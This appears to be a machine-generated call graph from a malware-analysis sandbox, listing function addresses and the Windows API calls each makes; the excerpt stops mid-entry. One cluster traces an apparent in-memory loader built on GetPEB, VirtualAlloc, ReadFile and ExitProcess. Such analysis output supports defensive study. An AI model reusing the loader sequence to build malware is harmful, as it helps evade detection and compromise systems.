97984->97989 97985->97989 97990 9f5bc9 97986->97990 97991 9f5be2 97986->97991 97993 9f56c4 __wsopen_s 7 API calls 97987->97993 97988->97994 97995 9ef2d9 __dosmaperr 20 API calls 97988->97995 97989->97988 97989->97994 97999 9f5c45 97989->97999 97990->97988 97996 9f5bd2 97990->97996 97997 9f5891 __wsopen_s 8 API calls 97991->97997 97992->97989 98004 9f5be0 97993->98004 97994->97961 97998 9f5c8e 97995->97998 98000 9f57a3 __wsopen_s 7 API calls 97996->98000 97997->98004 98001 9ef2c6 __dosmaperr 20 API calls 97998->98001 98002 9f5c4c 97999->98002 98003 9f5c60 97999->98003 98000->98004 98001->97994 98005 9ef2d9 __dosmaperr 20 API calls 98002->98005 98006 9ef2a3 __dosmaperr 20 API calls 98003->98006 98004->97989 98007 9f5c51 98005->98007 98006->97994 98008 9ef2c6 __dosmaperr 20 API calls 98007->98008 98008->97994 98009->97929 98010->97941 98011->97943 98012->97944 98013->97941 98014->97930 98015->97935 98016->97941 98017->97839 98019 9ee60f 98018->98019 98020 9ee624 98018->98020 98056 9ef2d9 20 API calls _abort 98019->98056 98023 9edc0b 62 API calls 98020->98023 98027 9ee61f 98020->98027 98022 9ee614 98057 9f27ec 26 API calls _abort 98022->98057 98025 9ee638 98023->98025 98037 9f4d7a 98025->98037 98027->97842 98029 9ed955 __fread_nolock 26 API calls 98030 9ee646 98029->98030 98041 9f862f 98030->98041 98033 9f29c8 _free 20 API calls 98033->98027 98034->97838 98035->97844 98036->97844 98038 9ee640 98037->98038 98039 9f4d90 98037->98039 98038->98029 98039->98038 98040 9f29c8 _free 20 API calls 98039->98040 98040->98038 98042 9f863e 98041->98042 98043 9f8653 98041->98043 98061 9ef2c6 20 API calls _abort 98042->98061 98045 9f868e 98043->98045 98048 9f867a 98043->98048 98063 9ef2c6 20 API calls _abort 98045->98063 98047 9f8643 98062 9ef2d9 20 API calls _abort 98047->98062 98058 9f8607 98048->98058 98049 9f8693 98064 9ef2d9 20 API calls _abort 98049->98064 98053 9ee64c 98053->98027 98053->98033 98054 9f869b 98065 9f27ec 26 API calls _abort 98054->98065 98056->98022 98057->98027 98066 9f8585 98058->98066 98060 9f862b 98060->98053 98061->98047 98062->98053 98063->98049 98064->98054 98065->98053 98067 9f8591 ___BuildCatchObject 98066->98067 98077 9f5147 EnterCriticalSection 98067->98077 98069 9f859f 98070 9f85c6 98069->98070 98071 9f85d1 98069->98071 98078 9f86ae 98070->98078 98093 9ef2d9 20 API calls _abort 98071->98093 98074 9f85cc 98094 9f85fb LeaveCriticalSection __wsopen_s 98074->98094 98076 9f85ee __fread_nolock 98076->98060 98077->98069 98095 9f53c4 98078->98095 98080 9f86c4 98108 9f5333 21 API calls 2 library calls 98080->98108 98082 9f86be 98082->98080 98084 9f53c4 __wsopen_s 26 API calls 98082->98084 98092 9f86f6 98082->98092 98083 9f871c 98090 9f873e 98083->98090 98109 9ef2a3 20 API calls __dosmaperr 98083->98109 98086 9f86ed 98084->98086 98085 9f53c4 __wsopen_s 26 API calls 98087 9f8702 CloseHandle 98085->98087 98091 9f53c4 __wsopen_s 26 API calls 98086->98091 98087->98080 98088 9f870e GetLastError 98087->98088 98088->98080 98090->98074 98091->98092 98092->98080 98092->98085 98093->98074 98094->98076 98096 9f53d1 98095->98096 98098 9f53e6 98095->98098 98097 9ef2c6 __dosmaperr 20 API calls 98096->98097 98100 9f53d6 98097->98100 98099 9ef2c6 __dosmaperr 20 API calls 98098->98099 98101 9f540b 98098->98101 98102 9f5416 98099->98102 98103 9ef2d9 __dosmaperr 20 API calls 98100->98103 98101->98082 98104 9ef2d9 __dosmaperr 20 API calls 98102->98104 98105 9f53de 98103->98105 98106 9f541e 98104->98106 98105->98082 98107 9f27ec _abort 26 API calls 98106->98107 98107->98105 98108->98083 98109->98090 98111 9c33fe _wcslen 98110->98111 98112 a0311d 98111->98112 98113 9c3411 98111->98113 98115 9dfddb 22 API calls 98112->98115 98114 9ca587 22 API calls 98113->98114 98116 9c341e __fread_nolock 98114->98116 98117 a03127 98115->98117 98116->97622 98118 9dfe0b 22 API calls 98117->98118 98119 a03157 __fread_nolock 98118->98119 98120->97638 98122 a30f7e 98121->98122 98137 a31097 98121->98137 98123 a30f9e 98122->98123 98124 a30fcb 98122->98124 98126 a30fe2 98122->98126 98123->98124 98129 a30fb2 98123->98129 98125 9dfe0b 22 API calls 98124->98125 98130 a30fc0 __fread_nolock 98125->98130 98127 9dfe0b 22 API calls 98126->98127 98138 a30fff 98126->98138 98127->98138 98128 a31026 98132 9dfe0b 22 API calls 98128->98132 98131 9dfe0b 22 API calls 98129->98131 98134 9dfddb 22 API calls 98130->98134 98131->98130 98133 a3102c 98132->98133 98140 9df1d8 22 API calls 98133->98140 98134->98137 98136 a31038 98141 9df6c9 24 API calls 98136->98141 98137->97290 98138->98128 98138->98129 98138->98130 98140->98136 98141->98130 98143 a2d4d5 98142->98143 98144 a2dbdc GetFileAttributesW 98142->98144 98143->97065 98144->98143 98145 a2dbe8 FindFirstFileW 98144->98145 98145->98143 98146 a2dbf9 FindClose 98145->98146 98146->98143 98176 9c6270 98147->98176 98149 9c9fd2 98182 9ca4a1 22 API calls __fread_nolock 98149->98182 98151 9c9fec 98151->97303 98154 a0f699 98161 9dfddb 22 API calls 98154->98161 98155 9ca6c3 22 API calls 98169 9c9eb5 98155->98169 98156 a0f7c4 98187 a296e2 84 API calls __wsopen_s 98156->98187 98158 9ca405 98158->98151 98189 a296e2 84 API calls __wsopen_s 98158->98189 98163 a0f754 98161->98163 98162 a0f7d2 98188 9ca4a1 22 API calls __fread_nolock 98162->98188 98166 9dfe0b 22 API calls 98163->98166 98165 a0f7e8 98165->98151 98168 9ca12c __fread_nolock 98166->98168 98168->98156 98168->98158 98169->98149 98169->98154 98169->98155 98169->98156 98169->98158 98169->98168 98170 9ca587 22 API calls 98169->98170 98171 9caec9 22 API calls 98169->98171 98174 9ca4a1 22 API calls 98169->98174 98181 9c4573 41 API calls _wcslen 98169->98181 98184 9c48c8 23 API calls 98169->98184 98185 9c49bd 22 API calls __fread_nolock 98169->98185 98186 9ca673 22 API calls 98169->98186 98170->98169 98172 9ca0db CharUpperBuffW 98171->98172 98183 9ca673 22 API calls 98172->98183 98174->98169 98175->97307 98177 9dfe0b 22 API calls 98176->98177 98178 9c6295 98177->98178 98179 9dfddb 22 API calls 98178->98179 98180 9c62a3 98179->98180 98180->98169 98181->98169 98182->98151 98183->98169 98184->98169 98185->98169 98186->98169 98187->98162 98188->98165 98189->98151 98191 9cae01 98190->98191 98194 9cae1c ISource 98190->98194 98192 9caec9 22 API calls 98191->98192 98193 9cae09 CharUpperBuffW 98192->98193 98193->98194 98194->97087 98196 9cacae 98195->98196 98197 9cacd1 98196->98197 98225 a3359c 82 API calls __wsopen_s 98196->98225 98197->97099 98200 a0fadb 98199->98200 98201 9cad92 98199->98201 98202 9dfddb 22 API calls 98201->98202 98203 9cad99 98202->98203 98226 9cadcd 98203->98226 98206->97137 98207->97140 98208->97140 98209->97092 98210->97129 98211->97110 98212->97129 98213->97129 98214->97099 98215->97099 98216->97099 98217->97099 98218->97099 98219->97099 98220->97121 98221->97129 98222->97126 98223->97136 98224->97129 98225->98197 98232 9caddd 98226->98232 98227 9cadb6 98227->97099 98228 9dfddb 22 API calls 98228->98232 98229 9ca961 22 API calls 98229->98232 98230 9ca8c7 22 API calls 98230->98232 98231 9cadcd 22 API calls 98231->98232 98232->98227 98232->98228 98232->98229 98232->98230 98232->98231 98233->97146 98234->97146 98235->97163 98236->97163 98237->97167 98238->97163 98239 9cf7bf 98240 9cfcb6 98239->98240 98241 9cf7d3 98239->98241 98276 9caceb 23 API calls ISource 98240->98276 98243 9cfcc2 98241->98243 98244 9dfddb 22 API calls 98241->98244 98277 9caceb 23 API calls ISource 98243->98277 98246 9cf7e5 98244->98246 98246->98243 98247 9cf83e 98246->98247 98248 9cfd3d 98246->98248 98250 9d1310 235 API calls 98247->98250 98254 9ced9d ISource 98247->98254 98278 a31155 22 API calls 98248->98278 98252 9cec76 ISource 98250->98252 98251 a14beb 98282 a3359c 82 API calls __wsopen_s 98251->98282 98252->98251 98252->98254 98255 9cfef7 98252->98255 98256 9dfddb 22 API calls 98252->98256 98258 9cf3ae ISource 98252->98258 98259 a14b0b 98252->98259 98260 9ca8c7 22 API calls 98252->98260 98261 a14600 98252->98261 98267 9cfbe3 98252->98267 98268 9ca961 22 API calls 98252->98268 98271 9e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98252->98271 98272 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98252->98272 98273 9e00a3 29 API calls pre_c_initialization 98252->98273 98274 9d01e0 235 API calls 2 library calls 98252->98274 98275 9d06a0 41 API calls ISource 98252->98275 98255->98254 98264 9ca8c7 22 API calls 98255->98264 98256->98252 98258->98254 98279 a3359c 82 API calls __wsopen_s 98258->98279 98280 a3359c 82 API calls __wsopen_s 98259->98280 98260->98252 98261->98254 98265 9ca8c7 22 API calls 98261->98265 98264->98254 98265->98254 98267->98254 98267->98258 98269 a14bdc 98267->98269 98268->98252 98281 a3359c 82 API calls __wsopen_s 98269->98281 98271->98252 98272->98252 98273->98252 98274->98252 98275->98252 98276->98243 98277->98248 98278->98254 98279->98254 98280->98254 98281->98251 98282->98254 98283 9c1098 98288 9c42de 98283->98288 98287 9c10a7 98289 9ca961 22 API calls 98288->98289 98290 9c42f5 GetVersionExW 98289->98290 98291 9c6b57 22 API calls 98290->98291 98292 9c4342 98291->98292 98293 9c93b2 22 API calls 98292->98293 98297 9c4378 98292->98297 98294 9c436c 98293->98294 98309 9c37a0 98294->98309 98295 9c441b GetCurrentProcess IsWow64Process 98298 9c4437 98295->98298 98297->98295 98299 a037df 98297->98299 98300 9c444f LoadLibraryA 98298->98300 98301 a03824 GetSystemInfo 98298->98301 98302 9c449c GetSystemInfo 98300->98302 98303 9c4460 GetProcAddress 98300->98303 98305 9c4476 98302->98305 98303->98302 98304 9c4470 GetNativeSystemInfo 98303->98304 98304->98305 98306 9c447a FreeLibrary 98305->98306 98307 9c109d 98305->98307 98306->98307 98308 9e00a3 29 API calls __onexit 98307->98308 98308->98287 98310 9c37ae 98309->98310 98311 9c93b2 22 API calls 98310->98311 98312 9c37c2 98311->98312 98312->98297 98313 a02ba5 98314 9c2b25 98313->98314 98315 a02baf 98313->98315 98341 9c2b83 7 API calls 98314->98341 98356 9c3a5a 98315->98356 98319 a02bb8 98321 9c9cb3 22 API calls 98319->98321 98323 a02bc6 98321->98323 98322 9c2b2f 98332 9c2b44 98322->98332 98345 9c3837 98322->98345 98324 a02bf5 98323->98324 98325 a02bce 98323->98325 98326 9c33c6 22 API calls 98324->98326 98328 9c33c6 22 API calls 98325->98328 98340 a02bf1 GetForegroundWindow ShellExecuteW 98326->98340 98329 a02bd9 98328->98329 98333 9c6350 22 API calls 98329->98333 98331 9c2b5f 98338 9c2b66 SetCurrentDirectoryW 98331->98338 98332->98331 98355 9c30f2 Shell_NotifyIconW ___scrt_fastfail 98332->98355 98336 a02be7 98333->98336 98334 a02c26 98334->98331 98337 9c33c6 22 API calls 98336->98337 98337->98340 98339 9c2b7a 98338->98339 98340->98334 98363 9c2cd4 7 API calls 98341->98363 98343 9c2b2a 98344 9c2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98343->98344 98344->98322 98346 9c3862 ___scrt_fastfail 98345->98346 98364 9c4212 98346->98364 98349 9c38e8 98351 a03386 Shell_NotifyIconW 98349->98351 98352 9c3906 Shell_NotifyIconW 98349->98352 98368 9c3923 98352->98368 98354 9c391c 98354->98332 98355->98331 98391 a01f50 98356->98391 98359 9c9cb3 22 API calls 98360 9c3a8d 98359->98360 98393 9c3aa2 98360->98393 98362 9c3a97 98362->98319 98363->98343 98365 a035a4 98364->98365 98366 9c38b7 98364->98366 98365->98366 98367 a035ad DestroyIcon 98365->98367 98366->98349 98390 a2c874 42 API calls _strftime 98366->98390 98367->98366 98369 9c393f 98368->98369 98388 9c3a13 98368->98388 98370 9c6270 22 API calls 98369->98370 98371 9c394d 98370->98371 98372 a03393 LoadStringW 98371->98372 98373 9c395a 98371->98373 98375 a033ad 98372->98375 98374 9c6b57 22 API calls 98373->98374 98376 9c396f 98374->98376 98379 9ca8c7 22 API calls 98375->98379 98384 9c3994 ___scrt_fastfail 98375->98384 98377 9c397c 98376->98377 98378 a033c9 98376->98378 98377->98375 98380 9c3986 98377->98380 98381 9c6350 22 API calls 98378->98381 98379->98384 98382 9c6350 22 API calls 98380->98382 98383 a033d7 98381->98383 98382->98384 98383->98384 98385 9c33c6 22 API calls 98383->98385 98386 9c39f9 Shell_NotifyIconW 98384->98386 98387 a033f9 98385->98387 98386->98388 98389 9c33c6 22 API calls 98387->98389 98388->98354 98389->98384 98390->98349 98392 9c3a67 GetModuleFileNameW 98391->98392 98392->98359 98394 a01f50 __wsopen_s 98393->98394 98395 9c3aaf GetFullPathNameW 98394->98395 98396 9c3ace 98395->98396 98397 9c3ae9 98395->98397 98398 9c6b57 22 API calls 98396->98398 98399 9ca6c3 22 API calls 98397->98399 98400 9c3ada 98398->98400 98399->98400 98401 9c37a0 22 API calls 98400->98401 98402 9c3ae6 98401->98402 98402->98362 98403 9e03fb 98404 9e0407 ___BuildCatchObject 98403->98404 98432 9dfeb1 98404->98432 98406 9e040e 98407 9e0561 98406->98407 98410 9e0438 98406->98410 98459 9e083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98407->98459 98409 9e0568 98460 9e4e52 28 API calls _abort 98409->98460 98422 9e0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98410->98422 98443 9f247d 98410->98443 98412 9e056e 98461 9e4e04 28 API calls _abort 98412->98461 98416 9e0576 98417 9e0457 98419 9e04d8 98451 9e0959 98419->98451 98421 9e04de 98424 9e04f3 98421->98424 98422->98419 98455 9e4e1a 38 API calls 2 library calls 98422->98455 98456 9e0992 GetModuleHandleW 98424->98456 98426 9e04fa 98426->98409 98427 9e04fe 98426->98427 98428 9e0507 98427->98428 98457 9e4df5 28 API calls _abort 98427->98457 98458 9e0040 13 API calls 2 library calls 98428->98458 98431 9e050f 98431->98417 98433 9dfeba 98432->98433 98462 9e0698 IsProcessorFeaturePresent 98433->98462 98435 9dfec6 98463 9e2c94 10 API calls 3 library calls 98435->98463 98437 9dfecb 98442 9dfecf 98437->98442 98464 9f2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98437->98464 98439 9dfed8 98440 9dfee6 98439->98440 98465 9e2cbd 8 API calls 3 library calls 98439->98465 98440->98406 98442->98406 98445 9f2494 98443->98445 98466 9e0a8c 98445->98466 98446 9e0451 98446->98417 98447 9f2421 98446->98447 98449 9f2450 98447->98449 98448 9e0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98450 9f2479 98448->98450 98449->98448 98450->98422 98474 9e2340 98451->98474 98454 9e097f 98454->98421 98455->98419 98456->98426 98457->98428 98458->98431 98459->98409 98460->98412 98461->98416 98462->98435 98463->98437 98464->98439 98465->98442 98467 9e0a97 IsProcessorFeaturePresent 98466->98467 98468 9e0a95 98466->98468 98470 9e0c5d 98467->98470 98468->98446 98473 9e0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98470->98473 98472 9e0d40 98472->98446 98473->98472 98475 9e096c GetStartupInfoW 98474->98475 98475->98454 98476 9c105b 98481 9c344d 98476->98481 98478 9c106a 98512 9e00a3 29 API calls __onexit 98478->98512 98480 9c1074 98482 9c345d __wsopen_s 98481->98482 98483 9ca961 22 API calls 98482->98483 98484 9c3513 98483->98484 98485 9c3a5a 24 API calls 98484->98485 98486 9c351c 98485->98486 98513 9c3357 98486->98513 98489 9c33c6 22 API calls 98490 9c3535 98489->98490 98519 9c515f 98490->98519 98493 9ca961 22 API calls 98494 9c354d 98493->98494 98495 9ca6c3 22 API calls 98494->98495 98496 9c3556 RegOpenKeyExW 98495->98496 98497 a03176 RegQueryValueExW 98496->98497 98502 9c3578 98496->98502 98498 a03193 98497->98498 98499 a0320c RegCloseKey 98497->98499 98500 9dfe0b 22 API calls 98498->98500 98499->98502 98509 a0321e _wcslen 98499->98509 98501 a031ac 98500->98501 98503 9c5722 22 API calls 98501->98503 98502->98478 98504 a031b7 RegQueryValueExW 98503->98504 98505 a031d4 98504->98505 98507 a031ee ISource 98504->98507 98506 9c6b57 22 API calls 98505->98506 98506->98507 98507->98499 98508 9c9cb3 22 API calls 98508->98509 98509->98502 98509->98508 98510 9c515f 22 API calls 98509->98510 98511 9c4c6d 22 API calls 98509->98511 98510->98509 98511->98509 98512->98480 98514 a01f50 __wsopen_s 98513->98514 98515 9c3364 GetFullPathNameW 98514->98515 98516 9c3386 98515->98516 98517 9c6b57 22 API calls 98516->98517 98518 9c33a4 98517->98518 98518->98489 98520 9c516e 98519->98520 98524 9c518f __fread_nolock 98519->98524 98522 9dfe0b 22 API calls 98520->98522 98521 9dfddb 22 API calls 98523 9c3544 98521->98523 98522->98524 98523->98493 98524->98521 98525 9c3156 98528 9c3170 98525->98528 98529 9c3187 98528->98529 98530 9c318c 98529->98530 98531 9c31eb 98529->98531 98568 9c31e9 98529->98568 98532 9c3199 98530->98532 98533 9c3265 PostQuitMessage 98530->98533 98535 a02dfb 98531->98535 98536 9c31f1 98531->98536 98538 9c31a4 98532->98538 98539 a02e7c 98532->98539 98570 9c316a 98533->98570 98534 9c31d0 DefWindowProcW 98534->98570 98584 9c18e2 10 API calls 98535->98584 98540 9c321d SetTimer RegisterWindowMessageW 98536->98540 98541 9c31f8 98536->98541 98543 9c31ae 98538->98543 98544 a02e68 98538->98544 98588 a2bf30 34 API calls ___scrt_fastfail 98539->98588 98545 9c3246 CreatePopupMenu 98540->98545 98540->98570 98547 a02d9c 98541->98547 98548 9c3201 KillTimer 98541->98548 98542 a02e1c 98585 9de499 42 API calls 98542->98585 98551 9c31b9 98543->98551 98552 a02e4d 98543->98552 98573 a2c161 98544->98573 98545->98570 98554 a02da1 98547->98554 98555 a02dd7 MoveWindow 98547->98555 98580 9c30f2 Shell_NotifyIconW ___scrt_fastfail 98548->98580 98557 9c3253 98551->98557 98563 9c31c4 98551->98563 98552->98534 98587 a20ad7 22 API calls 98552->98587 98553 a02e8e 98553->98534 98553->98570 98558 a02dc6 SetFocus 98554->98558 98559 a02da7 98554->98559 98555->98570 98582 9c326f 44 API calls ___scrt_fastfail 98557->98582 98558->98570 98559->98563 98564 a02db0 98559->98564 98560 9c3214 98581 9c3c50 DeleteObject DestroyWindow 98560->98581 98563->98534 98586 9c30f2 Shell_NotifyIconW ___scrt_fastfail 98563->98586 98583 9c18e2 10 API calls 98564->98583 98566 9c3263 98566->98570 98568->98534 98571 a02e41 98572 9c3837 49 API calls 98571->98572 98572->98568 98574 a2c276 98573->98574 98575 a2c179 ___scrt_fastfail 98573->98575 98574->98570 98576 9c3923 24 API calls 98575->98576 98578 a2c1a0 98576->98578 98577 a2c25f KillTimer SetTimer 98577->98574 98578->98577 98579 a2c251 Shell_NotifyIconW 98578->98579 98579->98577 98580->98560 98581->98570 98582->98566 98583->98570 98584->98542 98585->98563 98586->98571 98587->98568 98588->98553 98589 9c2e37 98590 9ca961 22 API calls 98589->98590 98591 9c2e4d 98590->98591 98668 9c4ae3 98591->98668 98593 9c2e6b 98594 9c3a5a 24 API calls 98593->98594 98595 9c2e7f 98594->98595 98596 9c9cb3 22 API calls 98595->98596 98597 9c2e8c 98596->98597 98598 9c4ecb 94 API calls 98597->98598 98599 9c2ea5 98598->98599 98600 a02cb0 98599->98600 98601 9c2ead 98599->98601 98698 a32cf9 98600->98698 98605 9ca8c7 22 API calls 98601->98605 98603 a02cc3 98604 a02ccf 98603->98604 98607 9c4f39 68 API calls 98603->98607 98610 9c4f39 68 API calls 98604->98610 98606 9c2ec3 98605->98606 98682 9c6f88 22 API calls 98606->98682 98607->98604 98609 9c2ecf 98611 9c9cb3 22 API calls 98609->98611 98612 a02ce5 98610->98612 98613 9c2edc 98611->98613 98724 9c3084 22 API calls 98612->98724 98683 9ca81b 41 API calls 98613->98683 98616 9c2eec 98618 9c9cb3 22 API calls 98616->98618 98617 a02d02 98725 9c3084 22 API calls 98617->98725 98620 9c2f12 98618->98620 98684 9ca81b 41 API calls 98620->98684 98621 a02d1e 98623 9c3a5a 24 API calls 98621->98623 98624 a02d44 98623->98624 98726 9c3084 22 API calls 98624->98726 98625 9c2f21 98627 9ca961 22 API calls 98625->98627 98629 9c2f3f 98627->98629 98628 a02d50 98630 9ca8c7 22 API calls 98628->98630 98685 9c3084 22 API calls 98629->98685 98632 a02d5e 98630->98632 98727 9c3084 22 API calls 98632->98727 98633 9c2f4b 98686 9e4a28 40 API calls 3 library calls 98633->98686 98635 a02d6d 98639 9ca8c7 22 API calls 98635->98639 98637 9c2f59 98637->98612 98638 9c2f63 98637->98638 98687 9e4a28 40 API calls 3 library calls 98638->98687 98641 a02d83 98639->98641 98728 9c3084 22 API calls 98641->98728 98642 9c2f6e 98642->98617 98644 9c2f78 98642->98644 98688 9e4a28 40 API calls 3 library calls 98644->98688 98645 a02d90 98647 9c2f83 98647->98621 98648 9c2f8d 98647->98648 98689 9e4a28 40 API calls 3 library calls 98648->98689 98650 9c2f98 98651 9c2fdc 98650->98651 98690 9c3084 22 API calls 98650->98690 98651->98635 98652 9c2fe8 98651->98652 98652->98645 98692 9c63eb 22 API calls 98652->98692 98654 9c2fbf 98656 9ca8c7 22 API calls 98654->98656 98658 9c2fcd 98656->98658 98657 9c2ff8 98693 9c6a50 22 API calls 98657->98693 98691 9c3084 22 API calls 98658->98691 98661 9c3006 98694 9c70b0 23 API calls 98661->98694 98665 9c3021 98666 9c3065 98665->98666 98695 9c6f88 22 API calls 98665->98695 98696 9c70b0 23 API calls 98665->98696 98697 9c3084 22 API calls 98665->98697 98669 9c4af0 __wsopen_s 98668->98669 98670 9c6b57 22 API calls 98669->98670 98671 9c4b22 98669->98671 98670->98671 98672 9c4c6d 22 API calls 98671->98672 98678 9c4b58 98671->98678 98672->98671 98673 9c4c6d 22 API calls 98673->98678 98674 9c9cb3 22 API calls 98676 9c4c52 98674->98676 98675 9c9cb3 22 API calls 98675->98678 98677 9c515f 22 API calls 98676->98677 98680 9c4c5e 98677->98680 98678->98673 98678->98675 98679 9c515f 22 API calls 98678->98679 98681 9c4c29 98678->98681 98679->98678 98680->98593 98681->98674 98681->98680 98682->98609 98683->98616 98684->98625 98685->98633 98686->98637 98687->98642 98688->98647 98689->98650 98690->98654 98691->98651 98692->98657 98693->98661 98694->98665 98695->98665 98696->98665 98697->98665 98699 a32d15 98698->98699 98700 9c511f 64 API calls 98699->98700 98701 a32d29 98700->98701 98702 a32e66 75 API calls 98701->98702 98703 a32d3b 98702->98703 98704 9c50f5 40 API calls 98703->98704 98722 a32d3f 98703->98722 98705 a32d56 98704->98705 98706 9c50f5 40 API calls 98705->98706 98707 a32d66 98706->98707 98708 9c50f5 40 API calls 98707->98708 98709 a32d81 98708->98709 98710 9c50f5 40 API calls 98709->98710 98711 a32d9c 98710->98711 98712 9c511f 64 API calls 98711->98712 98713 a32db3 98712->98713 98714 9eea0c ___std_exception_copy 21 API calls 98713->98714 98715 a32dba 98714->98715 98716 9eea0c ___std_exception_copy 21 API calls 98715->98716 98717 a32dc4 98716->98717 98718 9c50f5 40 API calls 98717->98718 98719 a32dd8 98718->98719 98720 a328fe 27 API calls 98719->98720 98721 a32dee 98720->98721 98721->98722 98729 a322ce 79 API calls 98721->98729 98722->98603 98724->98617 98725->98621 98726->98628 98727->98635 98728->98645 98729->98722 98730 16e24e3 98731 16e24e8 98730->98731 98739 16dfb88 98731->98739 98733 16e24f4 98734 16e25a8 98733->98734 98735 16e2512 98733->98735 98756 16e2e58 9 API calls 98734->98756 98743 16e21b8 98735->98743 98738 16e258f 98740 16dfbaa 98739->98740 98757 16e3068 GetPEB 98740->98757 98742 16e0213 98742->98733 98744 16dfb88 GetPEB 98743->98744 98747 16e2257 98744->98747 98746 16e2288 CreateFileW 98746->98747 98753 16e2295 98746->98753 98748 16e22b1 VirtualAlloc 98747->98748 98747->98753 98754 16e23b8 CloseHandle 98747->98754 98755 16e23c8 VirtualFree 98747->98755 98759 16e30c8 GetPEB 98747->98759 98749 16e22d2 ReadFile 98748->98749 98748->98753 98752 16e22f0 VirtualAlloc 98749->98752 98749->98753 98750 16e24a4 VirtualFree 98751 16e24b2 98750->98751 98751->98738 98752->98747 98752->98753 98753->98750 98753->98751 98754->98747 98755->98747 98756->98738 98758 16e3092 98757->98758 98758->98742 98760 16e30f2 98759->98760 98760->98746 98761 9c1033 98766 9c4c91 98761->98766 98765 9c1042 98767 9ca961 22 API calls 98766->98767 98768 9c4cff 98767->98768 98775 9c3af0 98768->98775 98770 a03cb6 98772 9c4d9c 98772->98770 98773 9c1038 98772->98773 98778 9c51f7 22 API calls __fread_nolock 98772->98778 98774 9e00a3 29 API calls __onexit 98773->98774 98774->98765 98779 9c3b1c 98775->98779 98778->98772 98780 9c3b0f 98779->98780 98781 9c3b29 98779->98781 98780->98772 98781->98780 98782 9c3b30 RegOpenKeyExW 98781->98782 98782->98780 98783 9c3b4a RegQueryValueExW 98782->98783 98784 9c3b80 RegCloseKey 98783->98784 98785 9c3b6b 98783->98785 98784->98780 98785->98784 98786 9c1cad SystemParametersInfoW 98787 a13f75 98798 9dceb1 98787->98798 98789 a13f8b 98791 a14006 98789->98791 98807 9de300 23 API calls 98789->98807 98792 9cbf40 235 API calls 98791->98792 98793 a14052 98792->98793 98795 a14a88 98793->98795 98809 a3359c 82 API calls __wsopen_s 98793->98809 98796 a13fe6 98796->98793 98808 a31abf 22 API calls 98796->98808 98799 9dcebf 98798->98799 98800 9dced2 98798->98800 98810 9caceb 23 API calls ISource 98799->98810 98802 9dcf05 98800->98802 98803 9dced7 98800->98803 98811 9caceb 23 API calls ISource 98802->98811 98805 9dfddb 22 API calls 98803->98805 98806 9dcec9 98805->98806 98806->98789 98807->98796 98808->98791 98809->98795 98810->98806 98811->98806 98812 16e1f38 98813 16dfb88 GetPEB 98812->98813 98814 16e2041 98813->98814 98826 16e1e28 98814->98826 98816 16e206a CreateFileW 98818 16e20bc 98816->98818 98819 16e20c1 98816->98819 98819->98818 98820 16e20d8 VirtualAlloc 98819->98820 98820->98818 98821 16e20f6 ReadFile 98820->98821 98821->98818 98822 16e2111 98821->98822 98823 16e0e28 13 API calls 98822->98823 98825 16e2144 98823->98825 98824 16e2167 ExitProcess 98824->98818 98825->98824 98827 16e1e31 Sleep 98826->98827 98828 16e1e3f 98827->98828 98829 9c1044 98834 9c10f3 98829->98834 98831 9c104a 98870 9e00a3 29 API calls __onexit 98831->98870 98833 9c1054 98871 9c1398 98834->98871 98838 9c116a 98839 9ca961 22 API calls 98838->98839 98840 9c1174 98839->98840 98841 9ca961 22 API calls 98840->98841 98842 9c117e 98841->98842 98843 9ca961 22 API calls 98842->98843 98844 9c1188 98843->98844 98845 9ca961 22 API calls 98844->98845 98846 9c11c6 98845->98846 98847 9ca961 22 API calls 98846->98847 98848 9c1292 98847->98848 98881 9c171c 98848->98881 98852 9c12c4 98853 9ca961 22 API calls 98852->98853 98854 9c12ce 98853->98854 98855 9d1940 9 API calls 98854->98855 98856 9c12f9 98855->98856 98902 9c1aab 98856->98902 98858 9c1315 98859 9c1325 GetStdHandle 98858->98859 98860 a02485 98859->98860 98861 9c137a 98859->98861 98860->98861 98862 a0248e 98860->98862 98865 9c1387 OleInitialize 98861->98865 98863 9dfddb 22 API calls 98862->98863 98864 a02495 98863->98864 98909 a3011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98864->98909 98865->98831 98867 a0249e 98910 a30944 CreateThread 98867->98910 98869 a024aa CloseHandle 98869->98861 98870->98833 98911 9c13f1 98871->98911 98874 9c13f1 22 API calls 98875 9c13d0 98874->98875 98876 9ca961 22 API calls 98875->98876 98877 9c13dc 98876->98877 98878 9c6b57 22 API calls 98877->98878 98879 9c1129 98878->98879 98880 9c1bc3 6 API calls 98879->98880 98880->98838 98882 9ca961 22 API calls 98881->98882 98883 9c172c 98882->98883 98884 9ca961 22 API calls 98883->98884 98885 9c1734 98884->98885 98886 9ca961 22 API calls 98885->98886 98887 9c174f 98886->98887 98888 9dfddb 22 API calls 98887->98888 98889 9c129c 98888->98889 98890 9c1b4a 98889->98890 98891 9c1b58 98890->98891 98892 9ca961 22 API calls 98891->98892 98893 9c1b63 98892->98893 98894 9ca961 22 API calls 98893->98894 98895 9c1b6e 98894->98895 98896 9ca961 22 API calls 98895->98896 98897 9c1b79 98896->98897 98898 9ca961 22 API calls 98897->98898 98899 9c1b84 98898->98899 98900 9dfddb 22 API calls 98899->98900 98901 9c1b96 RegisterWindowMessageW 98900->98901 98901->98852 98903 9c1abb 98902->98903 98904 a0272d 98902->98904 98905 9dfddb 22 API calls 98903->98905 98918 a33209 23 API calls 98904->98918 98907 9c1ac3 98905->98907 98907->98858 98908 a02738 98909->98867 98910->98869 98919 a3092a 28 API calls 98910->98919 98912 9ca961 22 API calls 98911->98912 98913 9c13fc 98912->98913 98914 9ca961 22 API calls 98913->98914 98915 9c1404 98914->98915 98916 9ca961 22 API calls 98915->98916 98917 9c13c6 98916->98917 98917->98874 98918->98908 98920 9cdee5 98923 9cb710 98920->98923 98924 9cb72b 98923->98924 98925 a10146 